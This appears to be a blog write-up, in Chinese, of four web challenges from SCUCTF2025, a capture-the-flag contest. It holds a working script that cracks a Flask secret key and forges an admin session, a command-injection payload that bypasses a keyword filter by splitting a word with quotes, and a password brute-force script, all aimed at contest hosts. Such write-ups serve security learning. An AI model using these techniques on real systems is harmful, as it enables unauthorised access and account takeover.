SCUCTF2025 WriteUp For Web

题目解题过程#

Web-教务管理系统解题步骤：#

简简单单SQL注入然后进入后台修改成绩，获得flag

flag{a74f0bf731c94271b43a7c6dcd14cf95}

Web-Cookies 解题步骤：#

这是一道典型的 Flask Session 伪造根据源代码，derived_level 函数决定了是否能获取flag 要成为superadmin，伪造Session，且满足两个条件： 1.role 必须是 “admin” 2.user 必须是 secret_key 的倒序字符串。、

安装flask-unsign工具下载rockyou字典爆破SECRET_KEY 然后构造payload发送伪造的session访问/admin 编写脚本获取flag

1
import requests
2
import subprocess
3
import re
4
import sys
5
import os
6

7
TARGET_URL = "http://challenge.qsnctf.com:45436"
8
ADMIN_URL = f"{TARGET_URL}/admin"
9

10
def log(msg, type="+"):
11
    print(f"[{type}] {msg}")
12

13
def get_initial_session():
14
    """获取初始 Session Cookie"""
15
    resp = requests.get(TARGET_URL, timeout=10)
16
    cookie = resp.cookies.get('session')
17
    return cookie
18

19
def crack_key(cookie):
20
    """使用外部的大型字典文件进行爆破"""
21
    wordlist_path = "rockyou.txt"
22

23
    log(f"正在使用外部字典 {wordlist_path} 爆破 SECRET_KEY...", "*")
24
    cmd = [
25
        "flask-unsign", "--unsign",
26
        "--cookie", cookie,
27
        "--wordlist", wordlist_path,
28
        "--no-literal-eval"
29
    ]
30
    process = subprocess.run(cmd, capture_output=True, text=True)
31

32
    output = process.stdout.strip()
33
    match = re.search(r"'(.*?)'", output)
34
    if match:
35
        key = match.group(1)
36
        log(f"爆破成功! SECRET_KEY: {key}")
37
        return key
38
    return output
39

40
def sign_admin_cookie(secret_key):
41
    """构造 Payload 并重新签名"""
42
    user_value = secret_key[::-1]
43
    payload = f"{{'role': 'admin', 'user': '{user_value}'}}"
44

45
    log(f"构造 Payload: {payload}", "*")
46

47
    cmd = [
48
        "flask-unsign", "--sign",
49
        "--cookie", payload,
50
        "--secret", secret_key
51
    ]
52
    process = subprocess.run(cmd, capture_output=True, text=True)
53
    forged_cookie = process.stdout.strip()
54
    return forged_cookie
55

56
def exploit(session_cookie):
57
    """发送 Payload 获取 Flag"""
58
    log("正在发送 Payload 获取 Flag...", "*")
59

60
    cookies = {'session': session_cookie}
61
    resp = requests.get(ADMIN_URL, cookies=cookies)
62
    flag_match = re.search(r'(qsnctf\{.*?\}|flag\{.*?\})', resp.text, re.IGNORECASE)
63
    log(f"最终结果: \033[92m{flag_match.group(1)}\033[0m", "+")
64

65
if __name__ == "__main__":
66
    sess = get_initial_session()
67
    key = crack_key(sess)
68
    evil_sess = sign_admin_cookie(key)
69
    exploit(evil_sess)

运行后解出flag

Web-死亡PING命令解题步骤：#

分析代码，需要进行命令注入和关键词过滤绕过

执行http://challenge.qsnctf.com:45532/?ip=127.0.0.1;ls / 得到

1
PING 127.0.0.1 (127.0.0.1): 56 data bytes 64 bytes from 127.0.0.1: seq=0 ttl=42 time=0.039 ms 64 bytes from 127.0.0.1: seq=1 ttl=42 time=0.100 ms 64 bytes from 127.0.0.1: seq=2 ttl=42 time=0.077 ms 64 bytes from 127.0.0.1: seq=3 ttl=42 time=0.080 ms --- 127.0.0.1 ping statistics --- 4 packets transmitted, 4 packets received, 0% packet loss round-trip min/avg/max = 0.039/0.074/0.100 ms bin dev etc flag home lib media mnt proc root run sbin srv sys tmp usr var

此时发现flag文件执行http://challenge.qsnctf.com:45532/?ip=127.0.0.1;cat /fl''ag 返回内容中获得flag flag{876ebc5691104710a5232b9a3274985c}

Web-MiniGame 解题步骤#

猜测得到用户名为zhangsan 根据题目提示编写脚本爆破密码

1
import requests
2
import datetime
3

4
url = "http://challenge.qsnctf.com:46025/login"
5
username = "zhangsan"
6
year = 1993
7

8
def attack():
9
    print(f"[*] 开始爆破用户 {username}，年份: {year} ...")
10

11
    start_date = datetime.date(year, 1, 1)
12
    end_date = datetime.date(year, 12, 31)
13
    delta = datetime.timedelta(days=1)
14

15
    current_date = start_date
16

17
    s = requests.Session()
18

19
    found = False
20

21
    while current_date <= end_date:
22
        date_str = current_date.strftime("%Y%m%d")
23
        password = f"{username}{date_str}"
24
        data = {
25
            "username": username,
26
            "password": password
27
        }
28

29
        try:
30
            response = s.post(url, data=data)
31
            if "密码错误" not in response.text:
32
                print(f"\n[+] !!! 爆破成功 !!!")
33
                print(f"[+] 正确密码: {password}")
34
                if "flag" in response.text.lower() or "qsnctf" in response.text.lower():
35
                    print("[+] 页面包含 Flag 信息，请查看下方内容:")
36
                    print("-" * 30)
37
                    print(response.text.strip())
38
                    print("-" * 30)
39
                else:
40
                    print("[+] 未直接发现 flag 关键字，可能是跳转了，请手动尝试该密码。")
41
                    print(f"[+] 状态码: {response.status_code}")
42

43
                found = True
44
                break
45
            if int(date_str) % 50 == 0:
46
                print(f"[-] 正在尝试: {password} ...")
47

48
        except Exception as e:
49
            print(f"[!] 请求异常: {e}")
50

51
        current_date += delta
52

53
    if not found:
54
        print("\n[-] 字典跑完了，未找到密码。")
55
        print("[-] 建议检查：1. 用户名是否正确？ 2. 密码格式是否为 zhangsan+YYYYMMDD？")
56

57
if __name__ == "__main__":
58
    attack()

爆破得到密码zhangsan19930725 登录进去与站长对话

获得flag：flag{b3af41867a30475683e5b4d0fad7a69d}

音乐

Lovely firefly!

音乐

题目解题过程#

Web-教务管理系统解题步骤：#

Web-Cookies 解题步骤：#

Web-死亡PING命令解题步骤：#

Web-MiniGame 解题步骤#

文章分享

音乐

目录

音乐

Lovely firefly!

音乐

SCUCTF2025 WriteUp For Web

题目解题过程#

Web-教务管理系统 解题步骤：#

Web-Cookies 解题步骤：#

Web-死亡PING命令 解题步骤：#

Web-MiniGame 解题步骤#

文章分享

音乐

目录

Web-教务管理系统解题步骤：#

Web-死亡PING命令解题步骤：#